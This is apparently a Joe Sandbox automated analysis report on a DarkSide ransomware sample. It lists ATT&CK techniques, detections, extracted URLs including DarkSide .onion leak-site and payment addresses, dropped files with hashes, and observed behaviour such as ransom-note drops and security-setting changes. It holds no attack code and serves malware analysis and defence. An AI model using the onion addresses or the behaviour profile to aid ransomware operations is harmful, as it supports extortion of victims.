                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeDirectory queried: C:\Documents and SettingsJump to behavior
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeDirectory queried: C:\Users\Default\DocumentsJump to behavior
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeDirectory queried: C:\Users\Default\Documents\My MusicJump to behavior
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeDirectory queried: C:\Users\Default\Documents\My MusicJump to behavior
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeDirectory queried: C:\Users\Default\Documents\My PicturesJump to behavior
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeDirectory queried: C:\Users\Default\Documents\My PicturesJump to behavior
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeDirectory queried: C:\Users\Default\Documents\My VideosJump to behavior
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeDirectory queried: C:\Users\Default\Documents\My VideosJump to behavior
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeDirectory queried: C:\Users\Default\Documents\My MusicJump to behavior
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeDirectory queried: C:\Users\Default\Documents\My MusicJump to behavior
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeDirectory queried: C:\Users\Default\Documents\My PicturesJump to behavior
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeDirectory queried: C:\Users\Default\Documents\My PicturesJump to behavior
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeDirectory queried: C:\Users\Default\Documents\My VideosJump to behavior
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeDirectory queried: C:\Users\Default\Documents\My VideosJump to behavior

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid Accounts2Windows Management Instrumentation1DLL Side-Loading1DLL Side-Loading1Disable or Modify Tools1Input Capture1Account Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationDefacement1
                      Default AccountsNative API1Valid Accounts2Valid Accounts2Obfuscated Files or Information1LSASS MemorySystem Service Discovery1Remote Desktop ProtocolData from Local System1Exfiltration Over BluetoothProxy1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsService Execution12Windows Service14Access Token Manipulation2Software Packing2Security Account ManagerFile and Directory Discovery12SMB/Windows Admin SharesInput Capture1Automated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Registry Run Keys / Startup Folder1Windows Service14DLL Side-Loading1NTDSSystem Information Discovery23Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptProcess Injection12Masquerading11LSA SecretsQuery Registry1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRegistry Run Keys / Startup Folder1Valid Accounts2Cached Domain CredentialsSecurity Software Discovery31VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion2DCSyncVirtualization/Sandbox Evasion2Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobAccess Token Manipulation2Proc FilesystemProcess Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Process Injection12/etc/passwd and /etc/shadowSystem Owner/User Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork SniffingRemote System Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 411752 Sample: P3FwQWmwUM.exe Startdate: 12/05/2021 Architecture: WINDOWS Score: 92 30 Antivirus / Scanner detection for submitted sample 2->30 32 Multi AV Scanner detection for submitted file 2->32 34 Found ransom note / readme 2->34 36 4 other signatures 2->36 7 svchost.exe 2->7         started        10 P3FwQWmwUM.exe 2->10         started        12 P3FwQWmwUM.exe 2->12         started        14 9 other processes 2->14 process3 dnsIp4 38 Changes security center settings (notifications, updates, antivirus, firewall) 7->38 17 MpCmdRun.exe 1 7->17         started        40 Contains functionalty to change the wallpaper 10->40 19 P3FwQWmwUM.exe 2 1 12->19         started        28 127.0.0.1 unknown unknown 14->28 signatures5 process6 process7 21 conhost.exe 17->21         started        23 P3FwQWmwUM.exe 35 19->23         started        file8 26 C:\README.2c9ccbf3.TXT, ASCII 23->26 dropped

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      P3FwQWmwUM.exe46%VirustotalBrowse
                      P3FwQWmwUM.exe62%ReversingLabsWin32.Ransomware.DarkSide
                      P3FwQWmwUM.exe100%AviraTR/Crypt.XPACK.Gen
                      P3FwQWmwUM.exe100%Joe Sandbox ML

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      3.2.P3FwQWmwUM.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      3.0.P3FwQWmwUM.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      4.2.P3FwQWmwUM.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      1.2.P3FwQWmwUM.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      4.0.P3FwQWmwUM.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      2.2.P3FwQWmwUM.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      2.0.P3FwQWmwUM.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      1.0.P3FwQWmwUM.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://ocsp.sectigo.com00%URL Reputationsafe
                      http://ocsp.sectigo.com00%URL Reputationsafe
                      http://ocsp.sectigo.com00%URL Reputationsafe
                      http://ocsp.sectigo.com00%URL Reputationsafe
                      http://darksidedxcftmqa.onion/blog/0%Avira URL Cloudsafe
                      http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#0%URL Reputationsafe
                      http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#0%URL Reputationsafe
                      http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#0%URL Reputationsafe
                      http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#0%URL Reputationsafe
                      http://darksidfqzcuhtk2.onion/K71D6P80%Avira URL Cloudsafe
                      https://sectigo.com/CPS0D0%URL Reputationsafe
                      https://sectigo.com/CPS0D0%URL Reputationsafe
                      https://sectigo.com/CPS0D0%URL Reputationsafe
                      https://sectigo.com/CPS0D0%URL Reputationsafe
                      http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O7h0%Avira URL Cloudsafe
                      http://darksidedxcftmqa.onion/blog/article/0%Avira URL Cloudsafe
                      http://darksidfqzcuhtk2.onion/K71D6P88YTX04R3ISCJZHMD5IYV55V9D0%Avira URL Cloudsafe
                      https://sectigo.com/CPS00%URL Reputationsafe
                      https://sectigo.com/CPS00%URL Reputationsafe
                      https://sectigo.com/CPS00%URL Reputationsafe
                      http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbr0%Avira URL Cloudsafe
                      http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s0%URL Reputationsafe
                      http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s0%URL Reputationsafe
                      http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s0%URL Reputationsafe
                      https://activity.windows.comr0%URL Reputationsafe
                      https://activity.windows.comr0%URL Reputationsafe
                      https://activity.windows.comr0%URL Reputationsafe
                      https://%s.xboxlive.com0%URL Reputationsafe
                      https://%s.xboxlive.com0%URL Reputationsafe
                      https://%s.xboxlive.com0%URL Reputationsafe
                      http://ocsp.sectigo.com0%0%Avira URL Cloudsafe
                      http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
                      http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
                      http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
                      https://dynamic.t0%URL Reputationsafe
                      https://dynamic.t0%URL Reputationsafe
                      https://dynamic.t0%URL Reputationsafe
                      http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
                      http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
                      http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
                      http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wk0%Avira URL Cloudsafe
                      https://%s.dnet.xboxlive.com0%URL Reputationsafe
                      https://%s.dnet.xboxlive.com0%URL Reputationsafe
                      https://%s.dnet.xboxlive.com0%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      No contacted domains info

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://ocsp.sectigo.com0P3FwQWmwUM.exefalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      https://dev.ditu.live.com/REST/v1/Routes/svchost.exe, 0000000C.00000002.312853819.000001F74323D000.00000004.00000001.sdmpfalse
                        		high
                        https://dev.virtualearth.net/REST/v1/Routes/Drivingsvchost.exe, 0000000C.00000003.312128129.000001F74325F000.00000004.00000001.sdmpfalse
                          		high
                          http://darksidedxcftmqa.onion/blog/P3FwQWmwUM.exe, 00000004.00000003.317859109.00000000007F2000.00000004.00000001.sdmptrue
                          • Avira URL Cloud: safe
                          		unknown
                          https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashxsvchost.exe, 0000000C.00000002.312853819.000001F74323D000.00000004.00000001.sdmpfalse
                            		high
                            https://t0.tiles.ditu.live.com/tiles/gensvchost.exe, 0000000C.00000003.312159045.000001F743247000.00000004.00000001.sdmpfalse
                              		high
                              https://torproject.org/P3FwQWmwUM.exe, 00000001.00000002.232594392.00000000007AA000.00000004.00000020.sdmp, P3FwQWmwUM.exe, 00000004.00000003.474064504.0000000002B42000.00000004.00000001.sdmp, P3FwQWmwUM.exe, 00000004.00000003.317859109.00000000007F2000.00000004.00000001.sdmp, P3FwQWmwUM.exe, 00000004.00000003.332042030.00000000007D8000.00000004.00000001.sdmp, P3FwQWmwUM.exe, 00000004.00000003.409934886.0000000002B69000.00000004.00000001.sdmp, notepad.exe, 00000016.00000002.505242943.0000019FB6B02000.00000004.00000020.sdmp, README.2c9ccbf3.TXT22.4.drfalse
                                		high
                                https://dev.virtualearth.net/REST/v1/Routes/Walkingsvchost.exe, 0000000C.00000003.312128129.000001F74325F000.00000004.00000001.sdmpfalse
                                  		high
                                  https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=svchost.exe, 0000000C.00000003.312297935.000001F743240000.00000004.00000001.sdmpfalse
                                    		high
                                    http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#P3FwQWmwUM.exefalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    https://dev.ditu.live.com/mapcontrol/logging.ashxsvchost.exe, 0000000C.00000003.312128129.000001F74325F000.00000004.00000001.sdmpfalse
                                      		high
                                      https://dev.ditu.live.com/REST/v1/Imagery/Copyright/svchost.exe, 0000000C.00000003.312226392.000001F74325A000.00000004.00000001.sdmpfalse
                                        		high
                                        https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=svchost.exe, 0000000C.00000003.289664910.000001F743231000.00000004.00000001.sdmpfalse
                                          		high
                                          http://darksidfqzcuhtk2.onion/K71D6P8P3FwQWmwUM.exe, 00000004.00000002.516426859.0000000002D40000.00000004.00000001.sdmptrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://dev.virtualearth.net/REST/v1/Transit/Schedules/svchost.exe, 0000000C.00000003.312297935.000001F743240000.00000004.00000001.sdmpfalse
                                            		high
                                            https://sectigo.com/CPS0DP3FwQWmwUM.exefalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O7hP3FwQWmwUM.exe, 00000004.00000003.415423650.0000000002B47000.00000004.00000001.sdmptrue
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://darksidedxcftmqa.onion/blog/article/P3FwQWmwUM.exe, 00000004.00000002.516426859.0000000002D40000.00000004.00000001.sdmptrue
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://appexmapsappupdate.blob.core.windows.netsvchost.exe, 0000000C.00000003.312128129.000001F74325F000.00000004.00000001.sdmpfalse
                                              		high
                                              http://www.bingmapsportal.comsvchost.exe, 0000000C.00000002.312755628.000001F743213000.00000004.00000001.sdmpfalse
                                                		high
                                                https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 0000000C.00000002.312853819.000001F74323D000.00000004.00000001.sdmpfalse
                                                  		high
                                                  https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashxsvchost.exe, 0000000C.00000003.312128129.000001F74325F000.00000004.00000001.sdmpfalse
                                                    		high
                                                    http://darksidfqzcuhtk2.onion/K71D6P88YTX04R3ISCJZHMD5IYV55V9DP3FwQWmwUM.exe, 00000004.00000003.317859109.00000000007F2000.00000004.00000001.sdmptrue
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://sectigo.com/CPS0P3FwQWmwUM.exefalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=svchost.exe, 0000000C.00000003.312282264.000001F743245000.00000004.00000001.sdmpfalse
                                                      		high
                                                      http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbrP3FwQWmwUM.exe, 00000004.00000003.296079532.0000000002AB0000.00000004.00000001.sdmp, notepad.exe, 00000016.00000002.505242943.0000019FB6B02000.00000004.00000020.sdmp, README.2c9ccbf3.TXT22.4.drtrue
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://dev.virtualearth.net/REST/v1/Routes/svchost.exe, 0000000C.00000002.312853819.000001F74323D000.00000004.00000001.sdmpfalse
                                                        		high
                                                        https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=svchost.exe, 0000000C.00000003.312282264.000001F743245000.00000004.00000001.sdmpfalse
                                                          		high
                                                          https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?svchost.exe, 0000000C.00000003.312297935.000001F743240000.00000004.00000001.sdmpfalse
                                                            		high
                                                            http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0sP3FwQWmwUM.exefalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            https://activity.windows.comrsvchost.exe, 0000000A.00000002.511163775.000002AA91043000.00000004.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=svchost.exe, 0000000C.00000002.312755628.000001F743213000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000002.312853819.000001F74323D000.00000004.00000001.sdmpfalse
                                                              		high
                                                              https://%s.xboxlive.comsvchost.exe, 0000000A.00000002.511163775.000002AA91043000.00000004.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		low
                                                              https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 0000000C.00000003.312159045.000001F743247000.00000004.00000001.sdmpfalse
                                                                		high
                                                                https://dev.virtualearth.net/REST/v1/Locationssvchost.exe, 0000000C.00000003.312128129.000001F74325F000.00000004.00000001.sdmpfalse
                                                                  		high
                                                                  https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 0000000C.00000003.289664910.000001F743231000.00000004.00000001.sdmpfalse
                                                                    		high
                                                                    https://dev.virtualearth.net/mapcontrol/logging.ashxsvchost.exe, 0000000C.00000003.312128129.000001F74325F000.00000004.00000001.sdmpfalse
                                                                      		high
                                                                      http://ocsp.sectigo.com0%P3FwQWmwUM.exefalse
                                                                      • Avira URL Cloud: safe
                                                                      		low
                                                                      http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0tP3FwQWmwUM.exefalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=svchost.exe, 0000000C.00000003.312226392.000001F74325A000.00000004.00000001.sdmpfalse
                                                                        		high
                                                                        http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.svchost.exe, 00000006.00000002.522409527.0000020C7BB50000.00000002.00000001.sdmpfalse
                                                                          		high
                                                                          https://dynamic.tsvchost.exe, 0000000C.00000003.312159045.000001F743247000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.312297935.000001F743240000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.312226392.000001F74325A000.00000004.00000001.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#P3FwQWmwUM.exefalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          https://dev.virtualearth.net/REST/v1/Routes/Transitsvchost.exe, 0000000C.00000003.312128129.000001F74325F000.00000004.00000001.sdmpfalse
                                                                            		high
                                                                            https://t0.ssl.ak.tiles.virtualearth.net/tiles/gensvchost.exe, 0000000C.00000003.289664910.000001F743231000.00000004.00000001.sdmpfalse
                                                                              		high
                                                                              http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9WkP3FwQWmwUM.exe, 00000004.00000002.510936905.0000000000768000.00000004.00000020.sdmptrue
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=svchost.exe, 0000000C.00000003.312226392.000001F74325A000.00000004.00000001.sdmpfalse
                                                                                		high
                                                                                https://activity.windows.comsvchost.exe, 0000000A.00000002.511163775.000002AA91043000.00000004.00000001.sdmpfalse
                                                                                  		high
                                                                                  https://dev.ditu.live.com/REST/v1/Locationssvchost.exe, 0000000C.00000003.312128129.000001F74325F000.00000004.00000001.sdmpfalse
                                                                                    		high
                                                                                    https://%s.dnet.xboxlive.comsvchost.exe, 0000000A.00000002.511163775.000002AA91043000.00000004.00000001.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    		low
                                                                                    https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=svchost.exe, 0000000C.00000003.312226392.000001F74325A000.00000004.00000001.sdmpfalse
                                                                                      		high

                                                                                      Contacted IPs

                                                                                      • No. of IPs < 25%
                                                                                      • 25% < No. of IPs < 50%
                                                                                      • 50% < No. of IPs < 75%
                                                                                      • 75% < No. of IPs

                                                                                      Public

                                                                                      IPDomainCountryFlagASNASN NameMalicious

                                                                                      Private

                                                                                      IP
                                                                                      127.0.0.1

                                                                                      General Information

                                                                                      Joe Sandbox Version:32.0.0 Black Diamond
                                                                                      Analysis ID:411752
                                                                                      Start date:12.05.2021
                                                                                      Start time:06:15:33
                                                                                      Joe Sandbox Product:CloudBasic
                                                                                      Overall analysis duration:0h 9m 1s
                                                                                      Hypervisor based Inspection enabled:false
                                                                                      Report type:full
                                                                                      Sample file name:P3FwQWmwUM.exe
                                                                                      Cookbook file name:default.jbs
                                                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                      Number of analysed new started processes analysed:23
                                                                                      Number of new started drivers analysed:0
                                                                                      Number of existing processes analysed:0
                                                                                      Number of existing drivers analysed:0
                                                                                      Number of injected processes analysed:0
                                                                                      Technologies:
                                                                                      • HCA enabled
                                                                                      • EGA enabled
                                                                                      • HDC enabled
                                                                                      • AMSI enabled
                                                                                      Analysis Mode:default
                                                                                      Analysis stop reason:Timeout
                                                                                      Detection:MAL
                                                                                      Classification:mal92.rans.evad.winEXE@19/47@0/1
                                                                                      EGA Information:Failed
                                                                                      HDC Information:
                                                                                      • Successful, ratio: 100% (good quality ratio 89%)
                                                                                      • Quality average: 75.8%
                                                                                      • Quality standard deviation: 33.2%
                                                                                      HCA Information:Failed
                                                                                      Cookbook Comments:
                                                                                      • Adjust boot time
                                                                                      • Enable AMSI
                                                                                      • Found application associated with file extension: .exe
                                                                                      Warnings:
                                                                                      Show All
                                                                                      • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                                                      • Excluded IPs from analysis (whitelisted): 13.88.21.125, 168.61.161.212, 104.43.139.144, 23.218.208.56, 204.79.197.200, 13.107.21.200, 20.82.210.154, 2.20.143.16, 2.20.142.209, 92.122.213.194, 92.122.213.247
                                                                                      • Excluded domains from analysis (whitelisted): www.bing.com, au.download.windowsupdate.com.edgesuite.net, fs.microsoft.com, dual-a-0001.a-msedge.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a767.dscg3.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, a-0001.a-afdentry.net.trafficmanager.net, blobcollector.events.data.trafficmanager.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, skypedataprdcolwus15.cloudapp.net, au-bg-shim.trafficmanager.net
                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                      • Report size getting too big, too many NtOpenFile calls found.
                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                      • Report size getting too big, too many NtQueryDirectoryFile calls found.
                                                                                      • Report size getting too big, too many NtQueryVolumeInformationFile calls found.

                                                                                      Simulations

                                                                                      Behavior and APIs

                                                                                      TimeTypeDescription
                                                                                      06:16:36API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                      06:17:55API Interceptor1x Sleep call for process: MpCmdRun.exe modified
                                                                                      06:18:05AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\README.2c9ccbf3.TXT

                                                                                      Joe Sandbox View / Context

                                                                                      IPs

                                                                                      No context

                                                                                      Domains

                                                                                      No context

                                                                                      ASN

                                                                                      No context

                                                                                      JA3 Fingerprints

                                                                                      No context

                                                                                      Dropped Files

                                                                                      No context

                                                                                      Created / dropped Files

                                                                                      C:\ProgramData\2c9ccbf3.ico
                                                                                      Process:C:\Users\user\Desktop\P3FwQWmwUM.exe
                                                                                      File Type:MS Windows icon resource - 5 icons, 64x64, 32 bits/pixel, 48x48, 32 bits/pixel
                                                                                      Category:dropped
                                                                                      Size (bytes):34494
                                                                                      Entropy (8bit):3.274622648924063
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:gbjP3AlUfsjVX50pzKOMkbD0NY3dIZJJw:8jP3Aufsj7cOTkvIZJW
                                                                                      MD5:4F57D54D01CCBDAF3EBFAC3EC0AC3FD7
                                                                                      SHA1:BC529DC03674D08D64D8442C4E1D1A3E3464E953
                                                                                      SHA-256:28B6841AA125225CD01BE09FBD2F1D7B3C2102D9FFC7DC8546700E67C2A6E3BC
                                                                                      SHA-512:BA9F779C0066EBEC8E555276AFBC862456B083138F8EB512CAE50B431EBE32C74C0A5EFB4E99F995BCFCBAEC2B71E242984FDD5084561940E741F1CAC1D6C246
                                                                                      Malicious:false
                                                                                      Preview: ......@@.... .(B..V...00.... ..%..~B.. .... .....&h........ ......x........ .h...V...(...@......... ......B..............................................................................................................................222.222.222.222.222.222.222.222.222.222.................................................................................................................................................................................................222.222.222.222.222.222.222.222.222.222.222.222.222.222.222.222.222.222.222.222.222.222.................................................................................................................................................................222.....222.222.222.222.222.222.222.222.222 222+22222222222+222 222.222.222.222.222.222.222.222.....222.............................................................................................................................................222.222.222.222.222.222.222.222.222=222v22
                                                                                      C:\ProgramData\Microsoft\Network\Downloader\edb.log
                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):4096
                                                                                      Entropy (8bit):0.5959966958795487
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:b7ZcE2k1GaD0JOCEfMuaaD0JOCEfMKQmDtc9tAl/gz2cE0fMbhEZolrRSQ2hyYI8:b7ZTGaD0JcaaD0JwQQtatAg/0bjSQJ
                                                                                      MD5:B04CC4E70792D21CB512B58CAB471DF0
                                                                                      SHA1:47CD1EFFD275EE99A5382319F44966938011144B
                                                                                      SHA-256:3887596A218A6744507CC827267D24292A690345BA24865FF04D0A9A3C2E6D29
                                                                                      SHA-512:2D2E82A381D641DD0B57AEA23CA24AADF218DD7CE0B6F10CCF8FC5515EF01AA05B6D599A3E40CB5E56A9BABB767D086D6711083FBDCD0D8AD024FC21C2247AC9
                                                                                      Malicious:false
                                                                                      Preview: ....E..h..(.....$....y............... ..1C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@...................$....y............&......e.f.3...w.......................3...w..................h..C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b...G............................................................................................................................................................................................................
                                                                                      C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                      File Type:Extensible storage engine DataBase, version 0x620, checksum 0x0df7824b, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                      Category:dropped
                                                                                      Size (bytes):32768
                                                                                      Entropy (8bit):0.09569855989648687
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:fSZGzwl/+hsNlsRIE11Y8TRX6NyyKJSZGzwl/+hsNlsRIE11Y8TRX6NyyK:yG0+k6O4bl6XK4G0+k6O4bl6XK
                                                                                      MD5:FD1613636B5C1F0359604709CF7E28D7
                                                                                      SHA1:0DD34912978CFECFC99094B13606F328245AD3BD
                                                                                      SHA-256:2C7D8799130967A0D07A9AA42F392C464F8B1BCA5A8E8F6638F62AFE15A08648
                                                                                      SHA-512:CDAF197A0E12CB998F31C0AEADE714A867F6A4F48018B724A584D6850F809B81F884DBC6BF99221409AA69670C59269B06E6B2D4AF56E7735F2FE8547CA58539
                                                                                      Malicious:false
                                                                                      Preview: ...K... ................e.f.3...w........................&..........w..$....y..h.(..............................3...w...........................................................................................................B...........@...................................................................................................... ........3...w......................................................................................................................................................................................................................................;.'.$....y......................$....y..........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):8192
                                                                                      Entropy (8bit):0.10955675807642352
                                                                                      Encrypted:false
